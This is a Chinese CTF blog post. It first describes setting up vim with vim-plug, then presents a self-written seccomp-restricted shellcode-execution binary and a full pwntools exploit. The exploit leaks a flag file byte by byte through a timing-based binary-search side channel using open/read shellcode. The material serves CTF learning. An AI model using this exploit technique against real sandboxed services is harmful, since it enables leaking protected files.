侧信道爆破二分法

前言

在经过一段时间的休息后,总算有时间开始搞ctf了,把以前没有完成的任务完成一下,并记录。

  • vim优化方案
  • 侧信道二分法爆破

Vim优化方案

在复现网上的相对应的题目时,由于没有原本的文件,按照对应思路写了一个文件,顺便优化了一下vim

用的是vim-plug加各种小插件的方案

  • gruvbox
  • nerdtree
  • vim-airline

首先安装vim-plug

https://github.com/junegunn/vim-plug这是地址

1
2
curl -fLo ~/.vim/autoload/plug.vim --create-dirs \
    https://raw.githubusercontent.com/junegunn/vim-plug/master/plug.vim

image-20230130183128286

发现需要科学上网,但是我的虚拟机不知道为什么无法科学上网,可能是配置的问题,有其他解决办法我就没有深究。

于是使用第二种办法

1
2
3
git clone https://gitee.com/S_rui/vim-plug.git
cp ./vim-plug/plug.vim ~/.vim/autoload/
rm -rf vim-plug

image-20230130183335598

亲测有用

然后配置对应文件即可

image-20230130183434369

image-20230130183447416

上面是因为我的计算机无法科学上网,于是我换成了gitee来拉取的,需要去修改.vim里面的配置文件,这个比较简单,就不占用篇幅了。

下面是原本视频里面的配置文件,可以根据需要选取

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
" Vim Plugin
call plug#begin('~/.vim/plugged')
Plug 'morhetz/gruvbox' 
Plug 'preservim/nerdtree'
Plug 'vim-airline/vim-airline'
call plug#end() 

let mapleader = ";"
nnoremap <Leader>q :q<CR>
nnoremap <Leader>w :w<CR>
nnoremap <Leader>g :NERDTreeToggle<CR>
nnoremap <Leader>f :NERDTreeFind<CR>

set clipboard=unnamedplus    " 使用系统剪切版 -> Vim
set clipboard=unnamed      " Vim -> 系统剪切版
colorscheme gruvbox
set nu

最后直接PlugInstall即可

image-20230130183951305

image-20230130184001853

然后就下载成功啦

视频在这,【2分钟配置让Vim好用10倍】 https://www.bilibili.com/video/BV17L411c7Eu/?share_source=copy_web&vd_source=41faae18c069e4173b0e6bb69470bcba

侧信道二分法

该方法学习于这篇文章

https://blog.csdn.net/woodwhale/article/details/120801223

根据该文章我实现了一个简单的程序来进行爆破

image-20230130184545777

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
#include<stdio.h>
#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>
int main()
{
        scmp_filter_ctx  ctx;
        ctx = seccomp_init(SCMP_ACT_ALLOW);
        seccomp_rule_add(ctx,SCMP_ACT_KILL,SCMP_SYS(execve),0);
        seccomp_rule_add(ctx,SCMP_ACT_KILL,SCMP_SYS(write),0);
        seccomp_load(ctx);
        int v3;
        v3 = getpagesize();
        int v6;
        v6 = mmap(0x1000,v3,7,34,0,0);
        char buf[0x18];
        read(0,v6,0x18);
        static void (*APPEntry)(void);
        APPEntry = (void (*)(void)) v6;
        (*APPEntry)();

        return 1;
}

最后按照文章来复现就行,由于原理比较简单只是做个记录,不再详解,这位师傅的博客里面都有

下面贴上该程序的exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
#!/usr/bin/env python3
# A script for pwn exp
from pwn import *
import os
import sys

context.os = 'linux'
context.terminal = ['tmux', 'splitw', '-h']
LOCAL = 1
LIBC = 0
elf_path = './vul'
libc_path = './libc.so.6'
code = ELF(elf_path)
context.arch=code.arch


r = lambda x: io.recv(x)
ra = lambda: io.recvall()
rl = lambda: io.recvline(keepends=True)
ru = lambda x: io.recvuntil(x, drop=True)
s = lambda x: io.send(x)
sl = lambda x: io.sendline(x)
sa = lambda x, y: io.sendafter(x, y)
sla = lambda x, y: io.sendlineafter(x, y)
ia = lambda: io.interactive()
c = lambda: io.close()
li = lambda x: log.info('\x1b[01;38;5;214m' + x + '\x1b[0m')
info = lambda data : log.info('\033[36m'+ data + '\033[0m')

clear  = lambda : os.system('clear')
if (LOCAL == 1):
    #context.log_level = 'debug'
    li("debug.......")
else:
    context.log_level = 'critical'
    server_ip = sys.argv[1].split(':')[0]
    server_port = int(sys.argv[1].split(':')[1])

# --------------------------func-----------------------------
def db():
    if (LOCAL):
        gdb.attach(io)
        pause()

def cat_flag():
    flag_header = b'flag{'
    sleep(1)
    sl('cat flag')
    ru(flag_header)
    flag = flag_header + ru('}') + b'}'
    exit(0)


# --------------------------exploit--------------------------
def exploit():
    li('exploit...')
    pwn()
def setread():
    global io
    # rdi rsi rdx rcx
    # read(0,&0x10018,0x250)
    shellcode = '''
        push 0x250
        pop rdx
        xor rsi,rsi
        mov rsi,0x10018
        xor rdi,rdi
        xor rax,rax
        syscall
    '''
    shellcode = asm(shellcode)
    s(shellcode)
    sleep(0.3)
def pwn():
    global io
    flag = "flag{"
    count = 1
    for i in range (len(flag),0x20):
        left = 0
        right = 127
        while left < right:
            setread()
            mid = (left + right) >> 1
            orw_payload = shellcraft.open('flag')
            orw_payload += shellcraft.read(3,'rsp',0x100)
            orw_payload += f'''
                mov dl,byte ptr [rsp+{i}]
                mov cl,{mid}
                cmp dl,cl
                ja loop
                mov al,0x3c
                syscall
                loop:
                jmp loop
            '''
            orw_payload = asm(orw_payload)
            sl(orw_payload)
            start_time = time.time()
            try:
                io.recv(timeout=0.25)
                if time.time() - start_time > 0.1:
                    left = mid + 1
            except:
                right = mid
            io.close()
            clear()
            info(f"time-->{count}")
            info(flag)
            count += 1
            io = elf.process()
        flag += chr(left)
        info(flag)
        if flag[-1] == "}":
            break

def finish():
    ia()
    c()


# --------------------------main-----------------------------
if __name__ == '__main__':
    if LOCAL:
        elf = ELF(elf_path)
        if LIBC:
            libc = ELF(libc_path)
            io = elf.process(env={"LD_PRELOAD": libc_path})
        else:
            io = elf.process()
    else:
        elf = ELF(elf_path)
        io = remote(server_ip, server_port)
        if LIBC:
            libc = ELF(libc_path)
    exploit()

    finish()